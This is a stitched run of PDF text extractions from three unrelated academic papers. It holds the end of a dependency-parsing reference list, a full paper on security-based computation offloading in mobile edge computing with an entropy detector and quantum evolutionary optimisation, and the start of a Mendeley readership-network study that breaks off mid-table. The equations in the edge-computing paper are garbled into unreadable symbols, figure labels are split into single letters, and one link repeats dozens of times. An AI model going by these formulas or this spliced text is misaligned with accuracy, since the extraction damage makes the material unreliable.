http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Jason Eisner and Giorgio Satta. 1999. Efficient parsing for bilexical context-free grammars and head automaton grammars. In 37th Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference, pages 457–464. Maryland. Daniel Fernández-González and Carlos Gómez- Rodŕıguez. 2018a. A dynamic oracle for linear- time 2-planar dependency parsing. In Conference of the North American Chapter of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, volume 2, pages 386–392. New Orleans, LA. Daniel Fernández-González and Carlos Gómez- Rodrı́guez. 2018b. Non-projective dependency parsing with non-local transitions. In Con- ference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, volume 2, pages 693–700. New Orleans, LA. Norman Fraser. 1989. Parsing and dependency grammar. UCL Working Papers in Linguistics, 1:296–319. Yoav Goldberg and Joakim Nivre. 2012. A dy- namic oracle for arc-eager dependency parsing. In The 24th International Conference on Com- putational Linguistics, pages 959–976. Mumbai. Yoav Goldberg and Joakim Nivre. 2013. Training deterministic parsers with non-deterministic oracles. Transactions of the Association for Computational Linguistics, 1:403–414. Yoav Goldberg, Francesco Sartorio, and Giorgio Satta. 2014. A tabular method for dynamic ora- cles in transition-based parsing. Transactions of the Association for Computational Linguistics, 2:119–130. Carlos Gómez-Rodŕıguez, John Carroll, and David Weir. 2008. A deductive approach to depen- dency parsing. In 46th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies, pages 968–976. Columbus, OH. Carlos Gómez-Rodrı́guez and Daniel Fernández- González. 2015. An efficient dynamic oracle for unrestricted non-projective parsing. In 53rd Annual Meeting of the Association for Compu- tational Linguistics and 7th International Joint Conference on Natural Language Processing, volume 2, pages 256–261. Beijing. Carlos Gómez-Rodrı́guez, Francesco Sartorio, and Giorgio Satta. 2014. A polynomial-time dynamic oracle for non-projective dependency parsing. In Conference on Empirical Methods in Natural Language Processing, Proceedings of the Conference, pages 917–927. Doha. Liang Huang and Kenji Sagae. 2010. Dynamic pro- gramming for linear-time incremental parsing. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 1077–1086. Uppsala. Mark Johnson. 2007. Transforming projective bilexical dependency grammars into efficiently- parsable CFGs with Unfold-Fold. In 45th Annual Meeting of the Association for Com- putational Linguistics, Proceedings of the Con- ference, pages 168–175. Prague. Sylvain Kahane, Alexis Nasr, and Owen Rambow. 1998. Pseudo-projectivity, a polynomially pars- able non-projective dependency grammar. In 36th Annual Meeting of the Association for Computational Linguistics and 17th Interna- tional Conference on Computational Linguis- tics, volume 1, pages 646–652. Montreal. Martin Kay. 2000. Guides and oracles for linear- time parsing. In Proceedings of the Sixth International Workshop on Parsing Technolo- gies, pages 6–9. Trento. Marco Kuhlmann, Carlos Gómez-Rodrı́guez, and Giorgio Satta. 2011. Dynamic programming algorithms for transition-based dependency pars- ers. In 49th Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference, pages 673–682. Portland, OR. Miryam de Lhoneux, Sara Stymne, and Joakim Nivre. 2017. Arc-hybrid non-projective depen- dency parsing with a static-dynamic oracle. In 15th International Conference on Parsing Technologies, pages 99–104. Pisa. Alexis Nasr. 1995. A formalism and a parser for lexicalised dependency grammars. In Fourth International Workshop on Parsing Technolo- gies, pages 186–195. Prague and Karlovy Vary. 295 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Joakim Nivre. 2008. Algorithms for deterministic incremental dependency parsing. Computa- tional Linguistics, 34(4):513–553. Joakim Nivre, Johan Hall, and Jens Nilsson. 2004. Memory-based dependency parsing. In Proceedings of the Eighth Conference on Computational Natural Language Learning, pages 49–56. Boston, MA. Joakim Nivre and Jens Nilsson. 2005. Pseudo- projective dependency parsing. In 43rd Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference, pages 99–106. Ann Arbor, MI. Peng Qi and Christopher D. Manning. 2017. Arc-swift: A novel transition system for depen- dency parsing. In 55th Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference, volume 2, pages 110–117. Vancouver. Milan Straka, Jan Hajič, Jana Straková, and Jan Hajič, jr. 2015. Parsing universal dependency treebanks using neural networks and search- based oracle. In Proceedings of the Fourteenth International Workshop on Treebanks and Linguistic Theories, pages 208–220. Warsaw. Hiroyasu Yamada and Yuji Matsumoto. 2003. Statistical dependency analysis with support vector machines. In 8th International Workshop on Parsing Technologies, pages 195–206. LORIA, Nancy. 296 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00268 by Carnegie Mellon University user on 06 April 2021 Introduction Preliminaries Tabular Dependency Parsing O(n3)- .4 Time Algorithm O(n2- .4 ) Time Algorithm O(n)- .4 Time Algorithm Towards Constant Time Per Calculation Experiments Optimal Projectivization Computing the Optimal Step Accuracy Conclusions work_jhs2l6kn55h5fbtcefmjli5asy ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-017 58 A Study of Edge Computing Offloading Based on Security Luo Pei School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 1985815398@qq.com Lei Juchao School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China E-mail: 274766943@qq.com Abstract—With the widespread use of IOT scenario and the development of mobile network technology, the access to many devices at the edge of the network has generated an exponential increase in the volume of data, bringing higher than ever before the demand for data transmission bandwidth, traditional centralized cloud computing can no longer meet the demand, the need to adopt edge computing distributed collaborative approach to data processing. In this paper, we study a mobile edge computing model based on energy consumption optimization management under a certain delay constraint, focus on an edge computing offload scheme based on security management, and design an offload decision scheme based on a multi-objective optimization hybrid quantum evolution algorithm (MHQEA) to ensure the security of user equipments during computing offload in the edge network and reduce total system energy consumption. Keywords-Edge Computing; Computing Offloading; Resource Allocation I. INTRODUCTION In recent years, with the rapid emergence of compute-intensive applications such as high-definition video, augmented reality/virtual reality, Internet of Things, Internet of Vehicles, and industrial Internet, people have put forward higher demands on the transmission rate and service quality of the network, resulting in an explosive growth in network traffic. At the same time, mobile devices are gradually emerging, due to the increasingly powerful design features, mobile devices have limited computing power, poor real-time and energy consumption limitations, it is difficult to bear the needs of computation-intensive, latency-sensitive and high energy consumption applications, In order to meet these challenges, the first solution proposed is to apply compute offload technology in mobile cloud computing (Mobile Cloud Computing (MCC)) architecture. By offloading the compute tasks of the terminal to a cloud data center with sufficient compute and storage resources, the delay and power consumption problems caused by the lack of computing power of the smart terminal can be alleviated to some extent. In order to solve the latency problem of MCC, researchers have focused on mobile edge computing, which is a core technology of 5G in 2014[2], it was proposed by the European Telecommunications Standardization Institute (ETSI) to provide computing, communication and storage capabilities closer to users by sinking cloud data centers to the wireless network edge. In mobile edge computing (MEC) systems, network edge devices such as base stations, access points and routers are given cloud-like computing and storage capabilities to serve users as an alternative to the cloud. At the same time, because it is placed close to mobile device terminals and data sources, it can significantly reduce mobile device load and reduce transmission latency. Among them, compute offloading, as a cutting-edge technology for edge computing, can be achieved by offloading compute tasks to a well- resourced edge cloud. The problem of computational offloading is mainly focused on offloading decisions and resource allocation, and many scholars have done relevant research on these issues. in the literature[3], a one-dimensional search algorithm is used to minimize the latency target and optimize the user task execution latency based on the application queue buffer queue state. Experimental results show that the optimal strategy proposed in this scheme can reduce the latency by up to 80% compared to the local execution strategy and up to 44% compared to the cloud execution strategy, which can effectively respond to the dynamic arrival of intensive applications; the user device in the literature[4] adopts energy harvesting technique to optimize the energy consumption of the execution task, and proposes that the dynamic optimization algorithm can reduce the execution time by up to 64% by offloading the task to the MEC, while preventing the offloader from being dropped. The shortcomings of both papers are that they do not consider the energy mailto:yangyh26@qq.com mailto:yangyh26@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 59 consumption of the user device, in the literature[4], it is assumed that the user device utilizes energy harvesting techniques and the energy consumption of the user device is ignored in the decision making process, energy harvesting techniques do not completely solve the energy consumption problem. The literature[5] investigates offload decisions during single node computation, the goal of which is not only to minimize execution latency but also to minimize the power consumption of edge computation, considering dense user devices capable of accessing multiple edge servers through nearby small nodes, and then proposes an optimal solution using an equivalent discrete framework, however, as the number of edge servers increases, this approach leads to high communication overhead and high computational complexity. Therefore, the authors solve this problem through an application assignment indexing scheme, which broadcasts through the node's own indexing policy and selects the most appropriate edge server to minimize execution latency and energy consumption, the downside of this scheme is that it does not consider scenarios with multiple compute nodes. The literature[6] considers the problem of joint optimization of energy consumption and latency of devices in a multi-user, multi-channel environment, where devices can optimize performance by adjusting the weighting parameters, however, this literature assumes that the computational resources of the MEC are sufficient, and the problem of insufficient edge computing resources exists in realistic production environments with multi- user conditions. However, the above literature does not consider the impact of security issues on system performance. Security issues such as privacy breaches may be encountered during the offloading process, so security issues are equally important in the study of edge computing offloading. Unlike the aforementioned literature, this paper designs a secure computational offloading method, the main contents of which are as follows: considering the impact of time delay and energy consumption on the system, the resource allocation in the task transfer process and the offloading decision in the task processing process are jointly optimized to achieve the cost optimization of mobile devices, and security is added on top of this. The specific work is as follows: 1) Design the MEC network architecture and ensure security. 2) Considering minimum energy consumption under time constraints and joint optimization to improve QoE. 3) An offloading decision solving method based on the Multi-Objective Optimization Hybrid Quantum Evolution Algorithm (MHQEA) is proposed. 4) Through simulation and comparison with conventional algorithms, it is proved that the energy saving cost proposed in this paper is lower, the total energy consumption of the system is lower, and the safety of the system is guaranteed. II. SECURITY-BASED MEC CALCULATION OFFLOADING SCHEME The compute offload technology offloads the compute tasks of the user terminal to the cloud service, solving the bottleneck in compute performance, resource storage, etc. of the user terminal. Computing offload technology was first proposed in the cloud, and the emergence of MEC has provided a new direction for the development of computing offload technology. Performing computational offload tasks in MEC not only solves the problem of high network resource utilization, but also solves the problem of latency. Therefore, the convergence of EMC and compute offload is an important direction for network development in the future. In mobile edge computing, the edge cloud needs to process tasks from a variety of mobile terminals in real time, and needs to coordinate the distribution of edge server resources and task loads to meet the heterogeneous requirements of different tasks for processing delay, execution energy consumption and reliability. Offload decision and resource allocation will directly affect the performance of computing offload in mobile edge computing, which has great research significance. A. Security-based system model design Although edge computing networks reduce request latency and core network pressure and improve network performance, but some problems in network security have been exposed, especially its distributed deployment mode leads to network security reduction, making DOS attacks easier, therefore, how to ensure the security of edge computing becomes one of the problems facing edge computing networks. The system establishes a model of multi-user multi-edge computing services in a wireless network. It is assumed that each edge server has complete control over the channel gain, local calculation energy, and input data size of all end users. In daily life, the number of users is greater than the number of base stations set in the edge cloud. We assume that the MEC system International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 60 consists of m mobile users and n base stations that can be connected to the edge cloud. mobile core network Security testing (Routing control) resource allocation offloading decision wireless access network smart terminal Mobile Edge Computing Figure 1. Security-based mobile edge computing network architecture B. Design of Unloading Scheme for Edge Computing Based on Security The computational offloading technique in edge computing involves the offloading decision and resource allocation, etc. The offloading decision is optimized for the performance of different services, and in this paper, the offloading decision is carried out with minimum energy consumption under the delay constraint, and the resource allocation is considered after the decision is offloaded. 1) Network model We use C={c1,c2,... ,cn} to represent the different edge nodes, and the MEC set of each edge node is represented as M={m1,m2,... .mp}, which provides computational offload for mobile terminals, and the UE set is denoted as N={n1,n2,... .nq}. 2) Offload decision model The offload decision model, as the core issue of computational offload techniques, is largely dependent on the computational task through the computing power of the device itself and the time delay and energy consumption that results when the offloading is completed to the edge. Therefore, it is necessary to calculate and analyze the delay and energy consumed by local computing and edge computing to complete the computing task. The unloading decisions within each time slot are expressed in matrix form, i.e., the unloading decision matrix is represented by A, as in (1).             mnn m aa aa A ,1 ,111 ... ......... ...  (1) Where, ∈ {0, 1} denotes whether device n offloads the task to the edge server, =0 denotes local execution, and anyway denotes the task is offloaded to the edge server. Each edge server can only handle one task at a time. Thus the constraints are as in (2).  1a 1 ,   N n mn  1a 1 ,   M m mn  (2) 3) Local execution Local execution means that user hands over task t to the mobile device for direct execution and the local execution of the task consumes mainly computational delay, as in (3).  l n nl i i i f C T  n  (3) where represents the CPU required to complete the task and represents the computing power of user n's mobile device. The energy consumption for the local execution of task t is mainly the energy consumption for processing computational tasks, as in (4).  iii n l CE  nn   (4) In the formula, indicates the energy consumption factor of the mobile device. According to formula (3) and formula (4), the locally executed valuation function is obtained as in (5).  l n el n l n l iiiii ETD nn      1,1,0,..  e n l n e n l n iiii ts    (5) In the formula, used as the weight of the local execution time and energy consumption of the mn a , mn a , in C l ni f in  e n l n ii  , International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 61 task, respectively, in order to determine the energy consumption of each user. 4) MEC server implementation The execution mode of the MEC server refers to that the user n migrates the task t to a virtual machine on the MEC server through a wireless channel for execution, and allocates computing and communication resources to the user equipment through the trust detection server. The delay of the entire calculation task is mainly transmission delay and calculation delay, as in (6).  F H R B T i c i ii n   (6) The data volume of the calculation result is much lower than the data input volume, so the transmission consumption of the calculation result is ignored. The energy consumption of the task t server mainly includes transmission energy consumption, MEC server calculation energy consumption and server monitoring energy consumption, as in (7).  monitor i n c n EH R B PE ii  i i   (7) According to formula (6) and formula (7), the locally executed valuation function is obtained as (8):    cn c n c n cc n iiii ETD   1 ni  (8) 5) Security inspection Introduce a security module in the MEC server to perform security checks on the offloading process. Because the routing module is responsible for the traffic, and because edge nodes have limited capacity compared to cloud computing centers, they are vulnerable to traffic attacks, and although individual edge nodes are compromised and nearby networks quickly find replaceable nodes to adjust to, a malicious attack can bring down a server. Therefore, traffic forwarding is divided into traffic types and firewalls are set up between the center and branches to enhance DDoS protection. It also detects virtual machine operation in real time to prevent malicious virtual machine migration behavior. The security detection module mainly detects the offloaded computational tasks through entropy detection algorithm, which can detect anomalies sensitive to the information entropy of changes in network parameters and UE parameters. In the case of potentially malicious offloads, the MEC controller transfers them to the security monitoring server, updates their trust values, labels them as trust violations, and verifies the user's access to the network through a combination of trust violation values and information entropy, increasing detection accuracy and reducing system overhead by unifying the monitoring of potentially malicious users. If there is any error in security detection, the defense policy module will continue to secure the network through reallocation of resources or security transfer. The entropy detection algorithm can accurately sense changes in network parameters and calculate the corresponding information entropy to detect whether a user is maliciously unloading. Energy is consumed during the detection of offloading computational tasks, aiming at the minimum energy consumption under time constraints and based on a safe offloading scheme, where the attributes involved in the entropy detection algorithm are user trust, offloading frequency, network environment, CPU and memory utilization, etc. The distribution of the property z in G belongs to a polynomial distribution, and the probability equation is as in (9).  z || 1|| 1z z ! || )( G z G GP G zG       (9) Where, the set of attributes G={g1,g2, ... ,g3}(1≤ z ≤ 5), A represents the proportion of users with attribute to the entire system users, can be calculated, we use the maximum threshold method to determine if there is an abnormal packet unloading, if it is greater than the set threshold, then it is a malicious unloading task, unloading is not allowed during the unloading decision. The entropy detection algorithm is as in (10).     5 1 ,,n )log( i inin RRR  (10) Where is the detection threshold and unloading is determined by the detection result, as in (11). z G  Gin PR , H R n International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 62        H n H nn n RR RR n ,0 ,1   (11) Detection of controlled energy consumption as in (12).  c nn M RM E  monitor  (12) represents the server's monitored energy consumption, represents the memory resources provided by the MEC server for one user device, and represents the resources available for the entire server. The overall optimization function is expressed as in (13):      ]-1[min n c nn   N C c nn l ii EE           Nn ccnn H n H nn n FF RR RR ts , n ,0 ,1 ..      (13) In the constraint condition, F represents the total CPU computing resources of the MEC server. The computing resources allocated by the MEC cannot exceed the total computing resources. III. ALGORITHM DESIGNS In the security-based computing offload scenario, the problem is an NP-hard problem because of the large data volume. To further solve this problem, this paper adopts a solution of MHQEA to find an optimal approximation of the model, and the process of finding an optimal approximation is represented as Algorithm 1. IV. SIMULATION PERFORMANCE EVALUATION Set the system time gap length to 20ms, calculate the local calculation energy consumption and unloading energy consumption by the total number of system user equipments 10, 20, 30, 40, 50, 60, respectively, and repeat each set of calculation 1000 times to take the average. As shown in Figure 2. Algorithm 1： A computational offloading algorithm based on MHQEA begin The current iteration number t = 0, and the maximum iteration number is set to M Initialize the offload decision matrix An(t) Find the optimal solution matrix Pn(t) by observing the state of An(t) through the make subroutine Correction of Pn(t) by reparation subroutine Evaluate the total energy consumption of the system and find the optimal solution B(t) while(t<M)do begin Number of current iterations t plus 1 An(t-1) is observed by the make subalgorithm to determine the Pn(t) Evaluate Pn(t) for the minimum total system energy consumption Updating An(t) through the update subroutine Find the optimal solution in Pn(t) and B(t-1) to b if(Current number of iterations meets migration conditions)then Migration b to B(t) end if end end Figure 2. Relationship between offloading delay and total number of user equipments in different ways As can be seen from Figure 2, the system energy consumption is higher for all local execution and all server execution, and the energy consumption is slightly higher for a security-based offload decision scheme than for an optimized energy-based offload monitor E n M c M 10 20 30 40 50 60 0 2 4 6 8 10 12 14 16 18 e n e r g y c o n s u m p t i o n / J total number of user equipments All local implementation All server execution Security-based computing offload Computational offload with optimization as the goal International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 63 scheme. Because of the energy consumption required for security testing, it improves the overall security of the system and ensures the quality of service for the user's device unloading. The optimal energy-based delay and security- based delay are calculated using the total number of user equipments in the system 10, 20, 30, 40, 50 and 60, respectively, and the average of each group is repeated 1000 times. As shown in Figure 3. Figure 3. Relationship between different ways of offloading energy consumption and total number of user equipments As can be seen from Figure 3, a security-based offloading decision scheme is better than an energy- optimized offloading scheme. V. CONCLUSION In the article, an offloading scheme for edge computing under security is proposed, which minimizes the total overhead of the system and improves the security of the offloading process, and we use an MHQEA-based algorithm to find the optimal offloading decision matrix. The simulation results show that the total system overhead for this option is lower than for other options, while maintaining safety. Because MEC servers are small data centers, each server has far less energy than a cloud data center. With the development of the industrial Internet, MEC servers will be heavily deployed, which will cause the overall energy consumption of the system, how to deal with the greater energy consumption is also something we should study in the future. REFERENCES [1] Xie Renchao, Huang Tao, Yang Fan, Liu Yunjie. Principles and practice of edge computing [M]. Beijing: People's Publishing House, 2019.152-155 [2] Taleb T, Samdanis K, Mada B , et al. On Multi-Access Edge Computing: A Survey of the Emerging 5G Network Edge Cloud Architecture and Orchestration[J]. Communications Surveys & Tutorials, IEEE, 2017, 19(3):1657-1681. [3] Liu J, Mao Y, Zhang J, et al. Delay-Optimal Computation Task Scheduling for Mobile-Edge Computing Systems[J]. 2016. [4] Mao Y, Zhang J, Letaief K B. Dynamic Computation Offloading for Mobile-Edge Computing with Energy Harvesting Devices[J]. IEEE Journal on Selected Areas in Communications, 2016:1-1. [5] Guo X, Singh R, Zhao T, et al. An index based task assignment policy for achieving optimal power-delay tradeoff in edge cloud systems[C]//ICC 2016 - 2016 IEEE International Conference on Communications. IEEE, 2016. [6] Chen X, Jiao L, Li W, et al. Efficient Multi-User Computation Offloading for Mobile-Edge Cloud Computing[J].IEEE/ACM Transactions on Networking, 2015:1-1. [7] Chen Yanbing, Li Juan, Zhang Qi. Exploration of quantum evolution algorithms for solving constrained multi-objective optimization problems[J]. Electronic Technology and Software Engineering, 2015, 000(016):P.185-186,187. 0 10 20 30 40 50 60 500 1000 1500 2000 2500 d e l a y / m s total number of user equipments Security-based offload delay Offload delay based on optimized energy consumption work_jlmpiucycfc6rdblexk6obfor4 ---- Networks of reader and country status: an analysis of Mendeley reader statistics Submitted 28 May 2015 Accepted 26 October 2015 Published 11 November 2015 Corresponding author Robin Haunschild, R.Haunschild@fkf.mpg.de Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.32 Copyright 2015 Haunschild et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Networks of reader and country status: an analysis of Mendeley reader statistics Robin Haunschild1, Lutz Bornmann2 and Loet Leydesdorff3 1 Information Retrieval Service, Max Planck Institute for Solid State Research, Stuttgart, Germany 2 Division for Science and Innovation Studies, Administrative Headquarters of the Max Planck Society, Munich, Germany 3 Amsterdam School of Communication Research (ASCoR), University of Amsterdam, Amsterdam, The Netherlands ABSTRACT The number of papers published in journals indexed by the Web of Science core collection is steadily increasing. In recent years, nearly two million new papers were published each year; somewhat more than one million papers when primary research papers are considered only (articles and reviews are the document types where primary research is usually reported or reviewed). However, who reads these papers? More precisely, which groups of researchers from which (self-assigned) scientific disciplines and countries are reading these papers? Is it possible to visualize readership patterns for certain countries, scientific disciplines, or academic status groups? One popular method to answer these questions is a network analysis. In this study, we analyze Mendeley readership data of a set of 1,133,224 articles and 64,960 reviews with publication year 2012 to generate three different networks: (1) The net- work based on disciplinary affiliations of Mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. In all four groups, the category with the addition “miscellaneous” prevails. (2) The network of co-readers in terms of professional status shows that a common interest in papers is mainly shared among PhD students, Master’s students, and postdocs. (3) The coun- try network focusses on global readership patterns: a group of 53 nations is identified as core to the scientific enterprise, including Russia and China as well as two thirds of the OECD (Organisation for Economic Co-operation and Development) countries. Subjects Data Science, Databases, Network Science and Online Social Networks Keywords Mendeley, Network, Bibliometrics, Pajek, Altmetrics, VOSviewer INTRODUCTION Bibliometrics is not only a mature research field, which develops advanced indicators for research evaluation purposes, but also a research field, which studies patterns in science. The best method for studying these patterns is bibliometric networking or science mapping. Here, bibliometric data are used to generate networks of citation relations (e.g., between scholarly journals), networks of co-authorships (e.g., between highly-cited researchers in information science), or networks of co-occurrence relations between keywords, words in abstracts and/or words in titles (e.g., co-occurrence relations between words in abstracts of papers published in information science) (Van Eck & How to cite this article Haunschild et al. (2015), Networks of reader and country status: an analysis of Mendeley reader statistics. PeerJ Comput. Sci. 1:e32; DOI 10.7717/peerj-cs.32 mailto:R.Haunschild@fkf.mpg.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.32 http://dx.doi.org/10.7717/peerj-cs.32 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 Waltman, 2014). Powerful computers have led to the analysis of large networks, which may include the whole Web of Science (WoS) database from Thomson Reuters (Milojević, 2014). Today, these networks are not only of interest for specialists in bibliometrics or networking, but also for stakeholders from publishers, research institutions, and funding agencies. According to Martin, Nightingale & Rafols (2014) “network and science-mapping visualizations have considerably enhanced the capacity to convey complex information to users. These tools are now sufficiently mature to be used not only available in academia but also in consultancy and funding organisations” (p. 4). Overviews of publications dealing with networking and mapping have been published, for example, by Börner, Sanyal & Vespignani (2007), Leydesdorff (2014), and Mingers & Leydesdorff (2015). In recent years, altmetrics has developed to a popular research field in bibliometrics (Bornmann, 2014). Altmetrics counts and analyzes views, downloads, clicks, notes, saves, tweets, shares, likes, recommends, tags, posts, trackbacks, discussions, bookmarks, and comments to scholarly papers. Altmetrics data reflect different kinds of research impact which has been demonstrated, for example, in the case of Mendeley readership data for social sciences and humanities (Mohammadi & Thelwall, 2013; Mohammadi & Thelwall, 2014; Sud & Thelwall, in press). Mendeley readership data are essentially bookmarking data. For the sake of simplicity, we refer to the Mendeley data only as reader counts. Because it is not clear, what altmetrics counts really measure, most of the studies in this field have calculated the correlation between altmetric counts and citation counts (Bornmann, 2015). A substantial positive correlation points to a certain, but otherwise undefined, meaning of altmetrics in a scientific context. Similar to bibliometric data, altmetric data can not only be used for research evaluation purposes, but also for network analysis and science mapping. Kraker et al. (2014) presented a methodology and prototype for creating knowledge domain visualizations based on readership statistics (from Mendeley). Haunschild & Bornmann (2015) generated a readership network which is based on Mendeley readers per (sub-)discipline for a large dataset of biomedical papers. In this study, we investigate Mendeley readership data for all articles and reviews in WoS where a DOI (digital object identifier) was available from 2012 with the following research questions: (1) Are there differences and similarities between disciplines in bookmarking papers? (2) How do researchers in different career stages differ in terms of bookmarking papers? Which groups of researchers read similar or different papers? (3) Researchers from which countries read papers? Are there patterns of similar readership between specific countries? We address these questions by studying the network nature of the Mendeley readership data. For this purpose, we generate three different networks: (1) the network of disciplinary affiliations can show similarities of and differences in the readerships of papers. (2) The status group network shows which status groups (e.g., students, lecturers, or professors) commonly read papers (or not). (3) The country network focuses on global readership patterns: similar and different readings of papers are visualized at the country level. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 2/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.32 METHODS Dataset used During December 11–23, 2014, Mendeley readership statistics for nA = 1,133,224 articles and nR = 64,960 reviews were requested via the Application Programming Interface (API), which was made available in 2014, using HTTP GET requests from R (http://www. r-project.org/). An example of the R script is available at http://dx.doi.org/10.6084/m9. figshare.1335688. All papers studied here were published in 2012. The publication year is a compromise of taking a rather recent publication year because Mendeley was founded in 2009 and allowing enough time after publication for reader counts to aggregate. However, as Mendeley reader counts are known to accumulate much faster than citation counts (Maflahi & Thelwall, in press), we feel justified using the publication year 2012. The DOIs of the papers in the samples were obtained from the in-house database of the Max Planck Society (MPG) based on the WoS and administered by the Max Planck Digital Library (MPDL). The DOI was used to identify the papers in the Mendeley API. The Mendeley reader counts of 1,074,407 articles (94.8%) and 62,771 reviews (96.6%) were retrieved via the Mendeley API. These percentages are higher than those reported in other studies (Haustein & Larivière, 2014b). The papers which were matched via their DOI in the Mendeley API (n = 1,137,178) are analyzed in the remainder of this study. In total, we recorded 9,352,424 reader counts for articles and 1,335,764 reader counts for reviews. It is optional for the users of Mendeley to provide their disciplinary affiliations (selecting from predefined sub-disciplines) and location. However, Mendeley does not provide the possible values of country names1 in the API. Therefore, we used the ISO (International 1 The country names in the Mendeley web frontend are standardized. The user provides the city name and Mendeley proposes different city–country combinations from which the user can choose. Organization for Standardization) names (see http://countrycode.org) as possible values. Out of the 237 countries we could not find any contributions from 59 countries. However, we are not able to distinguish between a country value which is not possible and a paper with no readers from this country. For example, one is less surprised to find no reader counts for countries like Holy See (Vatican City) than for Singapore. We retrieved 1,572,240 reader counts (16.8%) for articles and 212,693 reader counts (15.9%) for reviews where the users shared their location information. Country-specific readership information was available for 558,221 (49.3%) articles and 42,935 (66.1%) reviews. The academic status seems to be a mandatory piece of information, as the total number of Mendeley readers found agrees with the status-specific readership information. The self-assigned sub-discipline is not mandatory but most Mendeley users provide it in our sample set. Only 4,924 (0.05%) of the Mendeley article readers and 531 (0.04%) review readers did not share their (sub-) disciplinary affiliation. Software and statistics The data was organized at three levels of aggregation: (a) groups of individual readers who bookmark the papers, in terms of disciplinary affiliations; (b) groups of readers in terms of their professional status (Professor, PhD student, postdoc, etc.); Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 3/15 https://peerj.com/computer-science/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://dx.doi.org/10.6084/m9.figshare.1335688 http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://dx.doi.org/10.7717/peerj-cs.32 Table 1 Statistics of the full networks of disciplinary affiliations, countries, 